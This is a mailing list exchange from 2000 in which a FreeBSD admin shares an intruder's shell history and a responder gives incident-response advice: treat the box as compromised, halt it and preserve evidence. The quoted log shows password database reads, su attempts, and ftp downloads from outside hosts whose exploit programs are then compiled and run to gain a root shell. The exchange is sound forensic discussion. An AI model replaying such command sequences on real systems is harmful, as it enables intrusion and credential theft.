From owner-freebsd-questions Mon Dec 18 12:47:39 2000 From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 12:47:34 2000 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from donkeykong.gpcc.itd.umich.edu (donkeykong.gpcc.itd.umich.edu [141.211.2.163]) by hub.freebsd.org (Postfix) with ESMTP id A8ACA37B400 for ; Mon, 18 Dec 2000 12:47:34 -0800 (PST) Received: from tempest.gpcc.itd.umich.edu (smtp@tempest.gpcc.itd.umich.edu [141.211.2.155]) by donkeykong.gpcc.itd.umich.edu (8.8.8/4.3-mailhub) with ESMTP id PAA07861; Mon, 18 Dec 2000 15:47:33 -0500 (EST) Received: from localhost (timcm@localhost) by tempest.gpcc.itd.umich.edu (8.8.8/5.1-client) with ESMTP id PAA28355; Mon, 18 Dec 2000 15:47:32 -0500 (EST) Date: Mon, 18 Dec 2000 15:47:32 -0500 (EST) From: Tim McMillen X-Sender: timcm@tempest.gpcc.itd.umich.edu To: "Gerald T. Freymann" Cc: Questions Subject: Re: Hacker history file - OUCH In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Do you know for sure it was an intruder? Or was it just one of your users? either way that doesn't look good. I'm no security expert, but the programs they compiled and ran could easily be backdoors to get in easily the next time. It's hard (for me) to tell how bad it is without knowing whether they were successful in getting root priveledges. In the history file we don't see the output of the command. Nothing he did afterwards seems to require root priveledges, but if he had them then those programs could easily be backdoors. I would consider the box compromised. Is it still in use? The best way to get the most information about an attack is to shutdown and halt the machine ASAP. Then mount everything read only (perhaps on another machine. Then look araound. That way you won't overwrite possible clues. Any disk access after the intruder is there can overwrite that, and that is bad for evidence. You may want to contact the administrators at the sites he ftp'd to to alert them and see if they can tell what those files were that he downloaded. Tim On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > Seems we have an intruder on one of our boxes... the .history file from the > troubled account follows: > > cd bnc > ls > ./bash > who > cd /etc > more passwd > ps -l > ls -l > more pwd.db > more hosts > pico adduser.conf.bak > pico group > su user > pico group.bak > pico ftpuser > O > pico ftpusers > su toor > su operator > id > pico spwd.db > su wheel > pico passwd > cd /var/tmp > ls -a > cd ... > ls -a > cd .. > ls -l > ls -al > cd ... > ftp copper.he.net > chmod u+x xcon > ./xcon > id > rm * > ls > who > cd /var/tmp > ls -a > ls -al > cd ... > ls -a > ftp cih.edu.mx > ls > cc bsd1 bsd-cron.c > cc -o bsd1 bsd-cron.c > ./bsd1 > id > cc -o bsd2 bsd2.c > ./bsd2 > id > ls > ftp cih.edu.mx > ./bsd sh > ./bsd.sh > chmod u+x bsd.sh > ./bsd.sh > /tmp/sh > id > ls > cc -o bsdsmail bsdsmail.c > ./bsdsmail > ls -a > pico hack > ls > pico user.inf > ls > id > rm * > exit > > Anybody recognize what the intruder has set up? > > -Gerry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message